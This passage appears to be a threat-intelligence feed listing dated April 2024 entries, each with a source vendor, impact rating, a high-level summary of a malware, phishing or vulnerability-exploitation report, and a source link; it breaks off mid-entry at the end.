Researchers at Positive Technologies have discovered that a group called TA558 has carried out over 300 attacks worldwide. The group exploits an old vulnerability, CVE-2017-11882, to spread malware in a campaign called SteganoAmor, which affects users in Latin America and other parts of the world. TA558 hides malware within its attacks using steganography.
Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/#id0
2024-04-15
Zero_Day_Exploitation_of_Unauthenticated_RCE_Vulnerability_in_GlobalProtect
HIGH
Intel Source:
Palo Alto, Volexity
Intel Name:
Zero_Day_Exploitation_of_Unauthenticated_RCE_Vulnerability_in_GlobalProtect
Date of Scan:
2024-04-15
Impact:
HIGH
Summary:
Researchers at PaloAlto have identified zero-day exploitation of a vulnerability found within the GlobalProtect feature of Palo Alto Networks PAN-OS. A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.
Source: https://unit42.paloaltonetworks.com/cve-2024-3400/#post-133365-_ydqdbjg0dngh https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
2024-04-15
Malvertising_campaigns_hijack_social_media_to_spread_stealers
LOW
Intel Source:
Bitdefender
Intel Name:
Malvertising_campaigns_hijack_social_media_to_spread_stealers
Date of Scan:
2024-04-15
Impact:
LOW
Summary:
Threat actors have been impersonating AI software such as Midjourney, Sora AI, DALL-E 3, Evoto, and ChatGPT 5 on Facebook to trick users into downloading purported official desktop versions of these tools. The malicious webpages then deliver infostealers such as Rilide, Vidar, IceRAT, and Nova Stealer.
Source: https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/#new_tab
2024-04-15
The_spread_of_infostealers_by_a_Russian_cybercriminal_campaign
LOW
Intel Source:
Recorded Future
Intel Name:
The_spread_of_infostealers_by_a_Russian_cybercriminal_campaign
Date of Scan:
2024-04-15
Impact:
LOW
Summary:
The Insikt Group has uncovered a large-scale Russian-language cybercrime operation that leverages fake Web3 gaming projects to distribute infostealer malware targeting both macOS and Windows users.
Source: https://www.recordedfuture.com/cybercriminal-campaign-spreads-infostealers-highlighting-risks-to-web3-gaming
2024-04-12
SolarMarker_malware_campaigns
LOW
Intel Source:
Esentire
Intel Name:
SolarMarker_malware_campaigns
Date of Scan:
2024-04-12
Impact:
LOW
Summary:
This month, eSentire's researchers discovered that SolarMarker malware campaigns now utilize PyInstaller to hide malicious PowerShell scripts, marking a shift from previous methods such as Inno Setup and PS2EXE.
Source: https://www.esentire.com/blog/solarmarkers-shift-to-pyinstaller-tactics
2024-04-12
Halcyon_Threat_Insights_003
LOW
Intel Source:
Halcyon
Intel Name:
Halcyon_Threat_Insights_003
Date of Scan:
2024-04-12
Impact:
LOW
Summary:
Halcyon researchers identified and blocked a wide range of threats in their clients’ environments that were missed by other security layers and that are often precursors to the delivery of a ransomware payload.
Source: https://www.halcyon.ai/blog/halcyon-threat-insights-003-march-2024
2024-04-12
Embedding_a_credit_card_skimmer_in_a_fake_Facebook_Pixel_tracker_script
LOW
Intel Source:
Sucuri
Intel Name:
Embedding_a_credit_card_skimmer_in_a_fake_Facebook_Pixel_tracker_script
Date of Scan:
2024-04-12
Impact:
LOW
Summary:
Sucuri recently discovered a case in which attackers took credit card skimming a step further by embedding a skimmer in a well-concealed fake Facebook Pixel tracker script.
Source: https://blog.sucuri.net/2024/04/credit-card-skimmer-hidden-in-fake-facebook-pixel-tracker.html
2024-04-12
A_New_Banking_Trojan_Called_Coyote
LOW
Intel Source:
Seqrite
Intel Name:
A_New_Banking_Trojan_Called_Coyote
Date of Scan:
2024-04-12
Impact:
LOW
Summary:
Researchers at Seqrite have discovered a brand-new banking trojan known as Coyote, which makes use of Squirrel Installer, a tool/library designed to install and manage Windows application updates. The malware appears to be more sophisticated than typical banking trojans and may pose a more serious threat in the coming days. It identifies the market it targets and focuses on various banking institutions in Brazil.
Source: https://www.seqrite.com/blog/exposing-coyote-the-next-gen-banking-trojan-revolutionizing-cyber-threats-in-brazil/
2024-04-12
Observed_spike_of_LockBit_related_activity_of_vulnerabilities_in_ScreenConnect
MEDIUM
Intel Source:
Trellix
Intel Name:
Observed_spike_of_LockBit_related_activity_of_vulnerabilities_in_ScreenConnect
Date of Scan:
2024-04-12
Impact:
MEDIUM
Summary:
Recently, Trellix researchers have observed a rise in LockBit-related activity exploiting vulnerabilities in ScreenConnect. The researchers are confident that the cybercriminal group behind LockBit ransomware partially restored its infrastructure and sought to create the impression that the law enforcement (LE) actions did not affect its normal operation.
Source: https://www.trellix.com/blogs/research/the-lockbits-attempt-to-stay-relevant-its-imposters-and-new-opportunistic-ransomware-groups/
2024-04-12
A_series_of_tax_themed_phishing_emails_delivering_the_Remcos_RAT
LOW
Intel Source:
Esentire
Intel Name:
A_series_of_tax_themed_phishing_emails_delivering_the_Remcos_RAT
Date of Scan:
2024-04-12
Impact:
LOW
Summary:
Last month, eSentire researchers detected a series of tax-themed phishing emails delivering the Remcos RAT as the final payload through GuLoader. The phishing email contained the link to the password-protected ZIP archive hosted on Adobe Document Cloud.
Source: https://www.esentire.com/blog/tax-season-alert-beware-of-guloader-and-remcos-rat
2024-04-12
The_XWorm_Tax_Scam
LOW
Intel Source:
Esentire
Intel Name:
The_XWorm_Tax_Scam
Date of Scan:
2024-04-12
Impact:
LOW
Summary:
Recently, eSentire SOC analysts shared details with their Threat Response Unit about a tax-themed threat delivering XWorm as the final payload. Researchers are certain the initial infection vector is a phishing email.
Source: https://www.esentire.com/blog/dont-take-the-bait-the-xworm-tax-scam
2024-04-11
A_sophisticated_FatalRAT_campaign_targeting_ryptocurrency_users
MEDIUM
Intel Source:
Cyble
Intel Name:
A_sophisticated_FatalRAT_campaign_targeting_ryptocurrency_users
Date of Scan:
2024-04-11
Impact:
MEDIUM
Summary:
Cyble researchers discovered a new phishing campaign aimed at cryptocurrency users. This campaign used a known FatalRAT and additional malware such as Clipper and Keylogger. The TAs target Chinese-speaking individuals or organizations, as evidenced by using Chinese-language installers. FatalRAT is a Remote Access Trojan that gives attackers control over the victim’s computer and is equipped with extensive capabilities for stealing sensitive information.
Source: https://cyble.com/blog/fatalrats-new-prey-cryptocurrency-users-in-the-crosshairs/
2024-04-11
A_Continuous_Refinement_of_Waterbear_and_Deuterbear_by_Earth_Hundun
MEDIUM
Intel Source:
Trend Micro
Intel Name:
A_Continuous_Refinement_of_Waterbear_and_Deuterbear_by_Earth_Hundun
Date of Scan:
2024-04-11
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have noticed a significant increase in cyberattacks directed at numerous organizations in different industries, including government, research, and technology. The cyberespionage group Earth Hundun, also known as BlackTech, is connected to the Waterbear malware family, which is responsible for these attacks. BlackTech is a threat actor that primarily targets government and technology institutions in the Asia-Pacific area.
Source: https://www.trendmicro.com/en_us/research/24/d/earth-hundun-waterbear-deuterbear.html
2024-04-11
Redis_Server_Used_to_Install_Metasploit_Meterpreter
LOW
Intel Source:
ASEC
Intel Name:
Redis_Server_Used_to_Install_Metasploit_Meterpreter
Date of Scan:
2024-04-11
Impact:
LOW
Summary:
Researchers from ASEC have found that the Redis service has been used to install the Metasploit Meterpreter backdoor. Redis (Remote Dictionary Server) is an open-source in-memory database and data structure store. It is assumed that the threat actors either exploited vulnerabilities to execute commands or abused improper settings.
Source: https://asec.ahnlab.com/en/64034/
2024-04-11
Credentials_Forwarded_to_Telegram_Bot_in_PEC_Phishing_Campaign
LOW
Intel Source:
CERT-AGID
Intel Name:
Credentials_Forwarded_to_Telegram_Bot_in_PEC_Phishing_Campaign
Date of Scan:
2024-04-11
Impact:
LOW
Summary:
Researchers from CERT-AGID have discovered a phishing campaign that aims to obtain credentials for Certified Electronic Mail (PEC) mailboxes through fraud. An email containing false information is sent to PEC account holders. The notification warns of a supposed account deactivation request that must be confirmed within 24 hours and invites the recipient to click a link in the message body if they believe this is an error.
Source: https://cert-agid.gov.it/news/campagna-di-phishing-pec-credenziali-inoltrate-ad-un-bot-telegram/
2024-04-11
The_Rapid_Rise_of_Abyss_Locker_Ransomware
MEDIUM
Intel Source:
Seqrite
Intel Name:
The_Rapid_Rise_of_Abyss_Locker_Ransomware
Date of Scan:
2024-04-11
Impact:
MEDIUM
Summary:
Seqrite researchers have noticed that a recently launched ransomware operation called Abyss Locker has quickly taken aim at businesses and grown into a serious threat to a variety of sectors, including public sector organizations, businesses, and industrial control systems (ICS). It poses a serious risk to both Linux and Windows systems.
Source: https://www.seqrite.com/blog/unveiling-abyss-locker-the-rapid-rise-of-a-menacing-ransomware-threat/
2024-04-11
New_Raspberry_Robin_Malware_Campaign_Spreading_Through_WSF_Files
HIGH
Intel Source:
HP Wolf
Intel Name:
New_Raspberry_Robin_Malware_Campaign_Spreading_Through_WSF_Files
Date of Scan:
2024-04-11
Impact:
HIGH
Summary:
HP Wolf Security researchers have discovered a new Raspberry Robin campaign wave that has propagated the malware through malicious Windows Script Files (WSFs) since March 2024. The scripts are highly obfuscated and use a range of anti-analysis techniques, enabling the malware to evade detection.
Source: https://threatresearch.ext.hp.com/raspberry-robin-now-spreading-through-windows-script-files/
2024-04-11
The_exposure_of_Privnote_Phishing_Sites
LOW
Intel Source:
Krebson Security
Intel Name:
The_exposure_of_Privnote_Phishing_Sites
Date of Scan:
2024-04-11
Impact:
LOW
Summary:
A network of websites that mimic the self-destructing messaging service Privnote.com is being used by cybercriminals to steal cryptocurrency addresses, reports the BBC’s Yolande Knell.
Source: https://krebsonsecurity.com/2024/04/fake-lawsuit-threat-exposes-privnote-phishing-sites/
2024-04-11
Continuation_of_execution_of_IDAT_Loader
MEDIUM
Intel Source:
Rapid7
Intel Name:
Continuation_of_execution_of_IDAT_Loader
Date of Scan:
2024-04-11
Impact:
MEDIUM
Summary:
In part 2 of this series, Rapid7 continues to provide an analysis of how an MSIX installer led to the download and execution of the IDAT Loader. After they analyzed the recent tactics, techniques, and procedures observed (TTPs), Rapid7 concluded that the activity is associated with financially motivated threat groups.
Source: https://www.rapid7.com/blog/post/2024/04/10/stories-from-the-soc-part-2-msix-installer-utilizes-telegram-bot-to-execute-idat-loader/
2024-04-11
Active_exploitation_continues_of_critical_D_Link_NAS_vulnerability
MEDIUM
Intel Source:
Cyble
Intel Name:
Active_exploitation_continues_of_critical_D_Link_NAS_vulnerability
Date of Scan:
2024-04-11
Impact:
MEDIUM
Summary:
Security analysts continue to observe the exploitation of critical D-Link NAS vulnerabilities, and Cyble Global Sensor Intelligence has observed active exploitation. The vulnerabilities, identified as CVE-2024-3272 and CVE-2024-3273, were originally discovered last month by a researcher using the alias “netsecfish” on GitHub, and D-Link disclosed them on April 4, 2024. The Cyble Intel network picked up ongoing exploitation attempts of these vulnerabilities starting April 9. This indicates the swift weaponization of publicly available exploits by Threat Actors (TAs) targeting vulnerable internet-exposed D-Link NAS devices. Affected products are D-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L up to version 20240403.
Source: https://cyble.com/blog/critical-d-link-nas-vulnerability-under-active-exploitation/
2024-04-10
Malicious_Campaign_Targeting_System_Administrator_With_Nitrogen_Malware
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Malicious_Campaign_Targeting_System_Administrator_With_Nitrogen_Malware
Date of Scan:
2024-04-10
Impact:
LOW
Summary:
Malwarebytes Labs researchers have observed an ongoing campaign targeting system administrators through fake ads for well-known system tools. These ads appear as sponsored links in Google searches, mainly in North America. Victims are lured into downloading what appear to be PuTTY or FileZilla installers but are actually Nitrogen malware. This malware allows attackers to breach networks, steal data, and deploy ransomware such as BlackCat/ALPHV.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/04/active-nitrogen-campaign-delivered-via-malicious-ads-for-putty-filezilla
2024-04-10
An_Established_Romanian_APT_Group_RUBYCARP
LOW
+
Intel Source:
Sysdig
Intel Name:
An_Established_Romanian_APT_Group_RUBYCARP
Date of Scan:
2024-04-10
Impact:
LOW
Summary:
Sysdig researchers have uncovered a persistent botnet maintained by a Romanian threat actor group, which they refer to as RUBYCARP. Based on the evidence, this threat actor appears to have been active for at least ten years. Its main mode of operation relies on a botnet built up through a number of publicly known exploits and brute-force attacks. The group uses both public and private IRC networks for communication. It also develops cyberweapons and target databases. Finally, it employs its botnet to mine cryptocurrency and send phishing emails.
Source: https://sysdig.com/blog/rubycarp-romanian-botnet-group/
2024-04-10
Activity_of_Sidewinder_Threat_Group
MEDIUM
+
Intel Source:
Strikeready
Intel Name:
Activity_of_Sidewinder_Threat_Group
Date of Scan:
2024-04-10
Impact:
MEDIUM
Summary:
This in-depth examination explores the methods the researchers used to locate and identify infrastructure connected to the Sidewinder threat group. It describes a broad approach in which several search queries are applied to different data sources with the goal of finding indicators and artifacts associated with the adversary's activities. The methodology consists of searching for particular strings, encoded payloads, and network fingerprints, and using intelligence feeds to find new domains, IPs, and possible infrastructure that the group uses for command and control.
Source: https://blog.strikeready.com/blog/rattling-the-cage-of-a-sidewinder
2024-04-10
TA547_Targets_German_Organizations_with_Rhadamanthys_Malware
LOW
+
Intel Source:
Proofpoint
Intel Name:
TA547_Targets_German_Organizations_with_Rhadamanthys_Malware
Date of Scan:
2024-04-10
Impact:
LOW
Summary:
Proofpoint researchers have discovered that a group tracked as TA547 is sending emails carrying Rhadamanthys malware to German organizations. This malware steals information and is used by many cybercriminals. The group also appears to be using a PowerShell script that may have been generated by a large language model such as ChatGPT or Gemini.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer
2024-04-10
Hackers_Using_New_Technique_to_Trick_Developers_in_Open_Source_Supply_Chains
MEDIUM
+
Intel Source:
Checkmarx
Intel Name:
Hackers_Using_New_Technique_to_Trick_Developers_in_Open_Source_Supply_Chains
Date of Scan:
2024-04-10
Impact:
MEDIUM
Summary:
Researchers at Checkmarx have examined the concerning practice of attackers abusing GitHub's search feature to spread malware. By creating repositories with well-known names and topics, attackers trick unsuspecting users into downloading and running harmful programs.
Source: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
2024-04-10
Exposing_Smoke_and_Screen_Mirrors_Backdoor
LOW
+
Intel Source:
sophos
Intel Name:
Exposing_Smoke_and_Screen_Mirrors_Backdoor
Date of Scan:
2024-04-10
Impact:
LOW
Summary:
Researchers at Sophos have investigated a backdoor hidden in an executable file that carried a genuine Microsoft Hardware Publisher Certificate. The analysis reveals the backdoor's association with LaiXi Android Screen Mirroring, a software package that appears benign at first glance. It also reveals the strategies threat actors use to avoid discovery.
Source: https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/
2024-04-10
A_potential_threat_detected_in_the_customer_environment
LOW
+
Intel Source:
ISC.SANS
Intel Name:
A_potential_threat_detected_in_the_customer_environment
Date of Scan:
2024-04-10
Impact:
LOW
Summary:
A senior SecOps analyst recently discussed a potential threat detected in a customer environment. It started with an investigation of a group called Wazawaka; after studying Wazawaka's activities, the threat-hunting team created numerous SentinelOne queries to detect similar activity. Although the threat-hunting team concluded that this activity was not the work of Wazawaka, they decided to continue the investigation.
Source: https://isc.sans.edu/diary/A+Use+Case+for+Adding+Threat+Hunting+to+Your+Security+Operations+Team+Detecting+Adversaries+Abusing+Legitimate+Tools+in+A+Customer+Environment+Guest+Diary/30816/
2024-04-09
LazyStealer_analysis
MEDIUM
+
Intel Source:
PTsecurity
Intel Name:
LazyStealer_analysis
Date of Scan:
2024-04-09
Impact:
MEDIUM
Summary:
In the first quarter of 2024, Positive Technologies' Expert Security Center (PT ESC) uncovered a series of attacks targeting government structures in Russia, Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia. The primary goal was to steal account credentials for various services used on government employees' computers. The group, dubbed Lazy Koala because of its simple techniques and the username managing the Telegram bots that receive the stolen data, used a malware called LazyStealer, which was straightforward but effective. All victims were directly notified about the compromise.
Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazystealer-sophisticated-does-not-mean-better/?sphrase_id=300945
2024-04-09
Attackers_Delivering_Multi_Stage_Malware_via_Invoice_Phishing
LOW
+
Intel Source:
Fortinet
Intel Name:
Attackers_Delivering_Multi_Stage_Malware_via_Invoice_Phishing
Date of Scan:
2024-04-09
Impact:
LOW
Summary:
Fortinet researchers have discovered an intricate multi-stage attack that leverages invoice-themed phishing decoys to deliver a wide range of malware such as Venom RAT, Remcos RAT, XWorm, NanoCore RAT, and a stealer that targets crypto wallets.
Source: https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins
2024-04-09
Phishing_campaign_targets_LinkedIn_users
LOW
+
Intel Source:
Perception-Point
Intel Name:
Phishing_campaign_targets_LinkedIn_users
Date of Scan:
2024-04-09
Impact:
LOW
Summary:
This blog highlights a new LinkedIn threat, one that combines breached accounts and an evasive 2-step phishing attack.
Source: https://perception-point.io/blog/professionally-hooked-microsoft-two-step-phishing-campaign-targets-linkedin-users/
2024-04-09
A_wild_exploitation_of_D_Link_NAS_RCE
LOW
+
Intel Source:
Greynoise
Intel Name:
A_wild_exploitation_of_D_Link_NAS_RCE
Date of Scan:
2024-04-09
Impact:
LOW
Summary:
A remote code execution vulnerability in D-Link NAS devices, tracked as CVE-2024-3273, is actively being exploited. The vulnerability is believed to affect as many as 92,000 devices.
Source: https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild
2024-04-09
A_Constant_Was_Found_in_AgentTesla_Italian_Campaigns
MEDIUM
+
Intel Source:
CERT-AGID
Intel Name:
A_Constant_Was_Found_in_AgentTesla_Italian_Campaigns
Date of Scan:
2024-04-09
Impact:
MEDIUM
Summary:
CERT-AGID researchers have noticed unusually high activity distinguished by the use of PDF files. The distribution of AgentTesla in Italy is the focus of yet another large operation that has been underway for roughly the past nine months and appears to follow a regular monthly cadence.
Source: https://cert-agid.gov.it/news/riscontrata-una-costante-nella-sequenza-di-campagne-agenttesla-mirate-allitalia/
2024-04-09
Boggy_Serpens_Use_of_AutodialDLL
LOW
+
Intel Source:
Palo Alto
Intel Name:
Boggy_Serpens_Use_of_AutodialDLL
Date of Scan:
2024-04-09
Impact:
LOW
Summary:
Researchers at Palo Alto Networks have found that Boggy Serpens is abusing the AutodialDLL registry key in Windows. They track the Iranian state-sponsored threat actor under the name Boggy Serpens, also known as MuddyWater or TA450.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-Boggy-Serpens-use-of-AutodialDLL.txt
2024-04-09
WarZone_RAT_Distributing_via_DBatLoader_Using_Phishing_Emails
LOW
+
Intel Source:
0DAY IN {REA_TEAM}
Intel Name:
WarZone_RAT_Distributing_via_DBatLoader_Using_Phishing_Emails
Date of Scan:
2024-04-09
Impact:
LOW
Summary:
Researchers from 0DAY IN have discovered a phishing email that uses DBatLoader to spread the WarZone RAT. The user received an email from the attacker with a .html file attached. When viewed in hex mode, the PO-2200934-KINQTE.html file appears to contain scripts and a sizable blob of base64-encoded data.
Source: https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/
2024-04-09
Raspberry_Robin_anti_emulation_trick
LOW
+
Intel Source:
Harfanglab
Intel Name:
Raspberry_Robin_anti_emulation_trick
Date of Scan:
2024-04-09
Impact:
LOW
Summary:
An analysis of the constantly evolving evasion capabilities employed by the Raspberry Robin malware, which has emerged as a prominent threat. The report delves into the recent variant's unique anti-emulation techniques that leverage undocumented functions from the Windows Defender emulator's virtual DLLs, potentially marking the first instance of such exploitation. It highlights the malware's ability to evade detection and facilitate access for other threat actors, emphasizing the need for proactive countermeasures.
Source: https://harfanglab.io/en/insidethelab/raspberry-robin-and-its-new-anti-emulation-trick/
2024-04-09
The_increased_activity_of_the_malware_initiated_vulnerability
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
The_increased_activity_of_the_malware_initiated_vulnerability
Date of Scan:
2024-04-09
Impact:
MEDIUM
Summary:
Palo Alto Networks Unit 42 detected an increased number of threat actors turning to malware-initiated scanning attacks. The blog details how attackers use infected hosts to scan their targets instead of the more traditional approach of direct scans. By launching scanning attacks from compromised hosts, attackers can cover their traces, bypass geofencing, expand botnets, and leverage the resources of the compromised devices.
Source: https://unit42.paloaltonetworks.com/malware-initiated-scanning-attacks/
2024-04-08
Enhancing_Endpoint_Security_Through_Threat_Hunting
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Enhancing_Endpoint_Security_Through_Threat_Hunting
Date of Scan:
2024-04-08
Impact:
LOW
Summary:
Researchers from ISC.SANS highlight the importance of integrating threat hunting into Security Operations Teams to enhance endpoint security. Even when relying on Endpoint Detection and Response (EDR) tools, continuous fine-tuning is essential for maximum effectiveness. A case study shows how threat hunters detected an attempt to install a browser hijacker via a deceptive .msi file that evaded detection by the EDR.
Source: https://isc.sans.edu/diary/rss/30816
2024-04-08
Abusing_WebDAV_to_deliver_malicious_payload
LOW
+
Intel Source:
Any.Run
Intel Name:
Abusing_WebDAV_to_deliver_malicious_payload
Date of Scan:
2024-04-08
Impact:
LOW
Summary:
Any.Run analysts simulated an attack that uses the WebDAV file transfer protocol and explained how attackers often place malicious payloads on remote servers, which are then downloaded and executed on the user's PC using scripts or other methods.
Source: https://any.run/cybersecurity-blog/client-side-exploitation/
2024-04-08
Infostealers_Spread_via_Compromised_YouTube_Channels
LOW
+
Intel Source:
ASEC
Intel Name:
Infostealers_Spread_via_Compromised_YouTube_Channels
Date of Scan:
2024-04-08
Impact:
LOW
Summary:
ASEC researchers have discovered a cyber breach involving the compromise of well-known YouTube channels, used to distribute Vidar and LummaC2 malware. These malicious tools, categorized as infostealers, are capable of harvesting sensitive user data from infected devices and facilitating the installation of additional malware.
Source: https://asec.ahnlab.com/en/63980/
2024-04-08
A_New_Campaign_Found_That_Is_Aimed_at_People_in_South_Asia
LOW
+
Intel Source:
CYFIRMA Research
Intel Name:
A_New_Campaign_Found_That_Is_Aimed_at_People_in_South_Asia
Date of Scan:
2024-04-08
Impact:
LOW
Summary:
Researchers from CYFIRMA have discovered a sophisticated cyberthreat aimed at people in South Asia. Their research team found a malware campaign that used an executable from a deceptive self-extracting (SFX) archive. These files are a component of a complex attack used to compromise systems and carry out malicious activities; they are embedded in the malicious binaries and a fake PDF. Additional investigation suggests that Russian cybercriminals may have collaborated, which raises questions about the C2 infrastructure targeting people in South Asia.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_new-campaign-targeting-individuals-in-south-activity-7183078047187714048--alo?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-04-08
Recent_activity_of_Youshe_malware_attack
LOW
+
Intel Source:
Antiy
Intel Name:
Recent_activity_of_Youshe_malware_attack
Date of Scan:
2024-04-08
Impact:
LOW
Summary:
Recently, Antiy CERT has detected attacks carried out by the "Youshe" cybercrime group targeting companies and personnel related to finance and taxation. There are three main types of initial malicious files dropped by the attackers: executable programs, CHM files, and the commercial remote control software "Third Eye". Most of the forged file names relate to finance and taxation, information, letters, and the like.
Source: https://www.antiy.cn/research/notice&report/research_report/SwimSnake_Analysis_202404.html
2024-04-08
Suspended_Domains_Show_Malevolent_Payload_for_Region_of_Latin_America
LOW
+
Intel Source:
Trustwave
Intel Name:
Suspended_Domains_Show_Malevolent_Payload_for_Region_of_Latin_America
Date of Scan:
2024-04-08
Impact:
LOW
Summary:
Trustwave researchers have discovered a phishing campaign aimed at the Latin American region. The phishing email had a ZIP attachment that, upon extraction, revealed an HTML page that, when opened, downloaded a malicious file disguised as an invoice.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/phishing-deception-suspended-domains-reveal-malicious-payload-for-latin-american-region/
2024-04-08
Malware_that_changes_the_Notepad_Plus_Plus_plugin
LOW
+
Intel Source:
ASEC
Intel Name:
Malware_that_changes_the_Notepad_Plus_Plus_plugin
Date of Scan:
2024-04-08
Impact:
LOW
Summary:
ASEC Lab's analysis confirmed that "mimeTools.dll," a basic plugin for Notepad++, had been modified and distributed. The malicious mimeTools.dll file was included in the installation file of a specific version of the Notepad++ package and disguised as a normal package file. mimeTools is a module that performs encoding functions such as Base64.
Source: https://asec.ahnlab.com/ko/63738/
2024-04-08
Mallox_ransomware_profile
LOW
+
Intel Source:
SOCRadar
Intel Name:
Mallox_ransomware_profile
Date of Scan:
2024-04-08
Impact:
LOW
Summary:
Mallox, a ransomware strain operated by a group of the same name, encrypts its victims' data and subsequently demands a ransom, typically in cryptocurrency. It is also called "TargetCompany," "Tohnichi," or "Fargo" ransomware and has been active since 2021.
Source: https://socradar.io/dark-web-profile-mallox-ransomware/
2024-04-08
NordVPN_posted_as_Bing_and_spreads_SecTopRAT_malware
LOW
+
Intel Source:
SCmagazine
Intel Name:
NordVPN_posted_as_Bing_and_spreads_SecTopRAT_malware
Date of Scan:
2024-04-08
Impact:
LOW
Summary:
Threat actors designed a fake website and a realistic-looking link for installing NordVPN, which was found to lead to an installer for the remote access trojan SecTopRAT. Malwarebytes reported the malware campaign to both Microsoft, which owns Bing, and Dropbox.
Source: https://www.scmagazine.com/news/bing-ad-posing-as-nordvpn-aims-to-spread-sectoprat-malware
2024-04-06
The_latest_C2_framework_attack_in_MuddyWater_activity
MEDIUM
+
Intel Source:
Deepinstinct
Intel Name:
The_latest_C2_framework_attack_in_MuddyWater_activity
Date of Scan:
2024-04-06
Impact:
MEDIUM
Summary:
Deep Instinct analysts dived into the details of the DarkBeatC2 attack framework, used by Iranian threat actors to target Israeli networks, and provided details on its capabilities and techniques. The post also emphasizes the importance of sharing information and addressing vulnerabilities to prevent attacks, and highlights the effectiveness of Deep Instinct's prevention-first capabilities.
Source: https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework
2024-04-06
Byakugan_malware_phishing_attack
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Byakugan_malware_phishing_attack
Date of Scan:
2024-04-06
Impact:
MEDIUM
Summary:
FortiGuard Labs collected a sample that distributed Byakugan, a new multi-functional malware discovered by FortiGuard Labs in January 2024. It is distributed through a PDF file and has features such as screen monitoring, screen capture, and stealing browser information. It also has anti-analysis and persistence capabilities to avoid detection. The researchers shared information on the infection vector, the webpage, the malware's features, and protections against it. The report also includes IOCs for organizations to check whether they have been impacted by this malware.
Source: https://www.fortinet.com/blog/threat-research/byakugan-malware-behind-a-phishing-attack
2024-04-05
Using_Binary_Ninja_to_Chop_Up_DoNex
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Using_Binary_Ninja_to_Chop_Up_DoNex
Date of Scan:
2024-04-05
Impact:
LOW
Summary:
Researchers at ISC.SANS have noted that, considering the popularity and effectiveness of LockBit, it is not surprising that more recent ransomware groups have opted to incorporate a significant portion of the LockBit code base into their own following the LockBit source code release in mid-June 2022. Darkrace, a ransomware group that emerged around the middle of June 2023, is one of LockBit's more obvious spinoffs. Its samples closely resembled binaries from the disclosed LockBit builder, and it used a similar distribution process. Regrettably, Darkrace vanished from view when the LockBit clone's operators chose to remove its leak site.
Source: https://isc.sans.edu/diary/Slicing+up+DoNex+with+Binary+Ninja/30812/
2024-04-05
The_Most_Recent_Round_of_Action_For_KoiLoader_or_KoiStealer
LOW
+
Intel Source:
PaloAlto
Intel Name:
The_Most_Recent_Round_of_Action_For_KoiLoader_or_KoiStealer
Date of Scan:
2024-04-05
Impact:
LOW
Summary:
Palo Alto Networks researchers reproduced an infection in a lab environment using the most recent round of KoiLoader/KoiStealer activity. The first bank-themed lures were seen on 2024-04-02, earlier that week.
Source: https://www.linkedin.com/posts/unit42_koiloader-koistealer-unit42threatintel-activity-7181656774993747968-DphD?utm_source=share&utm_medium=member_ios
2024-04-05
The_need_for_companies_to_upgrade_their_security_measures
LOW
+
Intel Source:
Talos
Intel Name:
The_need_for_companies_to_upgrade_their_security_measures
Date of Scan:
2024-04-05
Impact:
LOW
Summary:
The article provides a comprehensive overview of recent cybersecurity news and events. The "Top security headlines of the week" section highlights the joint charges and sanctions against a Chinese state-sponsored actor, a potential supply chain attack on Linux machines, and a backlog of vulnerabilities in the National Vulnerability Database. It also includes information about upcoming events and a list of prevalent malware files. The author discusses the use of cybersecurity as an excuse for return-to-office policies and argues that security measures should remain consistent regardless of where employees work from. The article emphasizes the need for companies to upgrade their security measures to counter adversaries' use of remote system management tools.
Source: https://blog.talosintelligence.com/threat-source-newsletter-april-4-2024/
2024-04-05
Vulnerability_in_Magento_Used_to_Install_Persistent_Backdoor
LOW
+
Intel Source:
SANSEC
Intel Name:
Vulnerability_in_Magento_Used_to_Install_Persistent_Backdoor
Date of Scan:
2024-04-05
Impact:
LOW
Summary:
A novel technique for infection persistence on Magento servers is being employed by attackers. Researchers from Sansec have found that malware was automatically injected into the database using a well-designed layout template.
Source: https://sansec.io/research/magento-xml-backdoor
2024-04-05
Next_gen_info_stealers
LOW
+
Intel Source:
Bitdefender
Intel Name:
Next_gen_info_stealers
Date of Scan:
2024-04-05
Impact:
LOW
Summary:
Bitdefender shared in their blog information about artificial intelligence in social media malvertising campaigns, where cybercriminals exploit AI-powered software to steal sensitive information from unsuspecting users. It also mentions the malware-as-a-service (MaaS) business model and details a particular malicious extension, Rilide Stealer V4.
Source: https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/
2024-04-05
NordVPN_Masquerade_Leads_to_Fake_Site
LOW
+
Intel Source:
Malwarebytes
Intel Name:
NordVPN_Masquerade_Leads_to_Fake_Site
Date of Scan:
2024-04-05
Impact:
LOW
Summary:
